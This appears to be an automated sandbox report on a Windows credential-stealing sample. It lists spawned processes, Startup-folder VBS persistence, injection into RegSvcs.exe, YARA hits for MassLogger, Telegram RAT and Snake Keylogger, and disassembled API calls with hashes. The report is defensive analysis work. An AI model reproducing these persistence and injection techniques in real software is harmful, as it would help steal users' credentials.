Encrial credential stealer malware, Source: 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs Detection: 53%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:37:58
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\eLo1khn7DQ.exe"
Imagebase:	0x7c0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	12:38:08
Start date:	10/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs"
Imagebase:	0x7ff7568d0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:38:09
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\done\lustring.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\done\lustring.exe"
Imagebase:	0xe0000
File size:	1'078'272 bytes
MD5 hash:	306ABB19056FCD6A9524D361B1BFF4F5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:38:11
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\done\lustring.exe"
Imagebase:	0xcb0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	5%
Total number of Nodes:	2000
Total number of Limit Nodes:	54

Executed Functions

Function 001F42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 001F430D

Part of subcall function 001F6B57: _wcslen.LIBCMT ref: 001F6B6A

GetCurrentProcess.KERNEL32(?,0028CB64,00000000,?,?), ref: 001F4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 001F4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 001F4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 001F4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 001F4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 001F447B
GetSystemInfo.KERNEL32(?,?,?), ref: 001F44A0

Strings

kernel32.dll, xrefs: 001F444F
GetNativeSystemInfo, xrefs: 001F4460
|O, xrefs: 002336F8

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 49c22f7baa8c1237a566075e45d9ea9db740920db104a0e565dc075d99f34404
Instruction ID: 8a816c163194cc66bb44974adf34b366dc489988487b31399ea4a66aa59a5c66
Opcode Fuzzy Hash: 49c22f7baa8c1237a566075e45d9ea9db740920db104a0e565dc075d99f34404
Instruction Fuzzy Hash: 92A1067692A6C4CFC716DB687C8F9A57FA47B67308B1855D8E041A3A63D3304678CB21

Function 001F42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,001F50AA,?,?,00000000,00000000), ref: 001F42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001F50AA,?,?,00000000,00000000), ref: 001F42C9
LoadResource.KERNEL32(?,00000000,?,?,001F50AA,?,?,00000000,00000000,?,?,?,?,?,?,001F4F20), ref: 002335BE
SizeofResource.KERNEL32(?,00000000,?,?,001F50AA,?,?,00000000,00000000,?,?,?,?,?,?,001F4F20), ref: 002335D3
LockResource.KERNEL32(001F50AA,?,?,001F50AA,?,?,00000000,00000000,?,?,?,?,?,?,001F4F20,?), ref: 002335E6

Strings

SCRIPT, xrefs: 001F42BF

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 2879fc33fa19ab04299a0d47d0a26b70d2b7ff25e4b2a4ca1647e1eefea2e398
Instruction ID: d8a59ec9d90f407e81f0db598270b28d586fe49362e90fb0d482e49eecfded89
Opcode Fuzzy Hash: 2879fc33fa19ab04299a0d47d0a26b70d2b7ff25e4b2a4ca1647e1eefea2e398
Instruction Fuzzy Hash: 93117974201705BFEB218BA5EC48F677BB9EBC9B51F248169B942966A0DB71D8008B30

Function 00232BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 001F2B6B

Part of subcall function 001F3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002C1418,?,001F2E7F,?,?,?,00000000), ref: 001F3A78

Part of subcall function 001F9CB3: _wcslen.LIBCMT ref: 001F9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,002B2224), ref: 00232C10
ShellExecuteW.SHELL32(00000000,?,?,002B2224), ref: 00232C17

Strings

runas, xrefs: 00232C0B

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: b5037ab3d466acdfc667fc3f90eb29f6fb8ac099403f833c131e34545f3e8b18
Instruction ID: fd7eeebbd8506109a3a55ee8e23f874d88cae2d998b3fc2b86615977f277ad94
Opcode Fuzzy Hash: b5037ab3d466acdfc667fc3f90eb29f6fb8ac099403f833c131e34545f3e8b18
Instruction Fuzzy Hash: FC11D63110830DAAC715FF60E856EBEB7A4AFB2380F44142DF796560A3CF31995AC752

Function 0025DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00235222), ref: 0025DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0025DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 0025DBEE
FindClose.KERNEL32(00000000), ref: 0025DBFA

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: b6af791efb679bd93f6800258f6a35200d092aedab47e1366c14487a41a640ea
Instruction ID: 6c9e912ae7ea93eff93952d9d69ae24e87d2408c819d99222ec3c4c564eda726
Opcode Fuzzy Hash: b6af791efb679bd93f6800258f6a35200d092aedab47e1366c14487a41a640ea
Instruction Fuzzy Hash: F2F0A0308219109782306F7CBC0D8BE37AC9E01336BA04703FC36C20E4EBB0596886A9

Function 001FBF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON

Download Yara Rule

Strings

p#,, xrefs: 002407CE

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: BuffCharUpper
String ID: p#,
API String ID: 3964851224-667003584
Opcode ID: 4d957af95c692380ed4a60c5120a9996efd00013c7450e44ccfe30f607174014
Instruction ID: fcce8c3ca7c2a1ba89e2914a4d1bdc97065f7c61a4569b40be1e841756fdbe4a
Opcode Fuzzy Hash: 4d957af95c692380ed4a60c5120a9996efd00013c7450e44ccfe30f607174014
Instruction Fuzzy Hash: B3A27B706183458FD728DF18C580B2AB7E1BF89304F14896DEA8A8B352D771EC95DF92

Function 001FD730 Relevance: 21.6, APIs: 14, Instructions: 625windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 001FD807
timeGetTime.WINMM ref: 001FDA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001FDB28
TranslateMessage.USER32(?), ref: 001FDB7B
DispatchMessageW.USER32(?), ref: 001FDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001FDB9F
Sleep.KERNEL32(0000000A), ref: 001FDBB1

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 8af7e1ac3fb0527a0dd7f921e24bd1be79c1be3c228fe433d5a36fde833d16ed
Instruction ID: 34cfe57b01bffd766b223eb50eec0488344068d4f6bf3560008573d1101bedc4
Opcode Fuzzy Hash: 8af7e1ac3fb0527a0dd7f921e24bd1be79c1be3c228fe433d5a36fde833d16ed
Instruction Fuzzy Hash: 9A420230618346DFD728CF24E888B7AB7A2BF46304F55465DF65587291C7B0E8A8CF92

Function 001F2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 001F2D07
RegisterClassExW.USER32(00000030), ref: 001F2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001F2D42
InitCommonControlsEx.COMCTL32(?), ref: 001F2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001F2D6F
LoadIconW.USER32(000000A9), ref: 001F2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001F2D94

Strings

+, xrefs: 001F2CF0
0, xrefs: 001F2CE9
TaskbarCreated, xrefs: 001F2D37
AutoIt v3 GUI, xrefs: 001F2D23

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 176410b7a4b2a2bc048ad5373d4c8bac5e2f3b75feffb4b2589a479e14e7443f
Instruction ID: 554bf46347e4e2ea783448b939dc8859fab977f0952298939528a0fe111e625f
Opcode Fuzzy Hash: 176410b7a4b2a2bc048ad5373d4c8bac5e2f3b75feffb4b2589a479e14e7443f
Instruction Fuzzy Hash: 3B21E4B5952208AFDB00DFA4F849A9DBBB8FB09700F10411AE511A62A1D7B14550CFA1

Function 00228D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.!, xrefs: 0022903A, 00228FD0, 00228FF2

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID: .!
API String ID: 0-3855568528
Opcode ID: 3bb402df4f2aea2fa3ea3f942e944ec7c225b5d2dffadfecda3af6ed74228f35
Instruction ID: 1af2f69f9214d1e52a5f4b3117bdab738ab4e4827eb2381f9ee78d2da5b78640
Opcode Fuzzy Hash: 3bb402df4f2aea2fa3ea3f942e944ec7c225b5d2dffadfecda3af6ed74228f35
Instruction Fuzzy Hash: A9C10475D2426ABFDB11DFE8E844BADBBB0AF09310F144059F814A7392CB759A91CF21

Function 0023065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0023039A: CreateFileW.KERNELBASE(00000000,00000000,?,00230704,?,?,00000000,?,00230704,00000000,0000000C), ref: 002303B7

GetLastError.KERNEL32 ref: 0023076F
__dosmaperr.LIBCMT ref: 00230776
GetFileType.KERNELBASE(00000000), ref: 00230782
GetLastError.KERNEL32 ref: 0023078C
__dosmaperr.LIBCMT ref: 00230795
CloseHandle.KERNEL32(00000000), ref: 002307B5
CloseHandle.KERNEL32(?), ref: 002308FF
GetLastError.KERNEL32 ref: 00230931
__dosmaperr.LIBCMT ref: 00230938

Strings

H, xrefs: 002308BD

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 01cc5d2a96cb91e79313b666161e31d962bd56e799701dabdd2c12cd632444d5
Instruction ID: 035e3b3aad339d9f39fb1269bfb8c9702ced0e97eea6139d832261acb6e530a9
Opcode Fuzzy Hash: 01cc5d2a96cb91e79313b666161e31d962bd56e799701dabdd2c12cd632444d5
Instruction Fuzzy Hash: 99A13872A201498FDF19EF68DCA5BAD7BB0AB46320F14015DF8159B2D1CB319C62CFA1

Function 001F344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001F3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002C1418,?,001F2E7F,?,?,?,00000000), ref: 001F3A78

Part of subcall function 001F3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001F3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001F356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0023318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002331CE
RegCloseKey.ADVAPI32(?), ref: 00233210
_wcslen.LIBCMT ref: 00233277
_wcslen.LIBCMT ref: 00233286

Strings

\Include\, xrefs: 001F3527
Software\AutoIt v3\AutoIt, xrefs: 001F3560
Include, xrefs: 00233184, 002331C5
\, xrefs: 0023328C

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 1a5c0e41e1ba229ae5d858576bb2545e1506caa49acb3661012970ddb30b9e8c
Instruction ID: 873b116859718ddcdfb5fe21946eddc598cee571be2912c281c4a69bfd6e1ec8
Opcode Fuzzy Hash: 1a5c0e41e1ba229ae5d858576bb2545e1506caa49acb3661012970ddb30b9e8c
Instruction Fuzzy Hash: EA7189B1414345DEC314EF65EC85DABBBE8FF95340F40056EF945931A0EB749A48CB62

Function 001F2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 001F2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 001F2B9D
LoadIconW.USER32(00000063), ref: 001F2BB3
LoadIconW.USER32(000000A4), ref: 001F2BC5
LoadIconW.USER32(000000A2), ref: 001F2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001F2BEF
RegisterClassExW.USER32(?), ref: 001F2C40

Part of subcall function 001F2CD4: GetSysColorBrush.USER32(0000000F), ref: 001F2D07
Part of subcall function 001F2CD4: RegisterClassExW.USER32(00000030), ref: 001F2D31
Part of subcall function 001F2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001F2D42
Part of subcall function 001F2CD4: InitCommonControlsEx.COMCTL32(?), ref: 001F2D5F
Part of subcall function 001F2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001F2D6F
Part of subcall function 001F2CD4: LoadIconW.USER32(000000A9), ref: 001F2D85
Part of subcall function 001F2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001F2D94

Strings

AutoIt v3, xrefs: 001F2C2F
#, xrefs: 001F2C16
0, xrefs: 001F2C0F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 2045e4ae40c7e3e331c99b7ba762f7201ca6d79e71a0240e77b6a6aa40f48c52
Instruction ID: e5497b53f321ed462aa929e64408afeefdfe1b478b90828b88f9afc42455e8d2
Opcode Fuzzy Hash: 2045e4ae40c7e3e331c99b7ba762f7201ca6d79e71a0240e77b6a6aa40f48c52
Instruction Fuzzy Hash: 5E217C74E01398ABDB109FA5FC4EEA9BFB4FB49B44F14009AE600A36A1D3B54520CF90

Function 001FB710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001FBB4E

Strings

p#,, xrefs: 001FBA72
p#,, xrefs: 001FBB6B
x#,, xrefs: 00240207
x#,, xrefs: 00240168
p#,, xrefs: 00240263
p%,, xrefs: 001FBB32
p%,, xrefs: 001FB8DC
p#,, xrefs: 0024024F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Init_thread_footer
String ID: p#,$p#,$p#,$p#,$p%,$p%,$x#,$x#,
API String ID: 1385522511-2618144462
Opcode ID: 169680f47b3e923c94738097383b0f61703a18d12d383833fd3f78553ab30e76
Instruction ID: 85e6e0f5d82f0019a7c2f04dd9ccb1ca0399947838b7db25626b44606b0a11f2
Opcode Fuzzy Hash: 169680f47b3e923c94738097383b0f61703a18d12d383833fd3f78553ab30e76
Instruction Fuzzy Hash: 1832DF74A1420ADFCB28CF54C8D4EBABBB5FF44344F158099EA05AB291C7B4AD91CB91

Function 001F3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,001F316A,?,?), ref: 001F31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,001F316A,?,?), ref: 001F3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001F3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,001F316A,?,?), ref: 001F3232
CreatePopupMenu.USER32 ref: 001F3246
PostQuitMessage.USER32(00000000), ref: 001F3267

Strings

TaskbarCreated, xrefs: 001F322D

Memory Dump Source

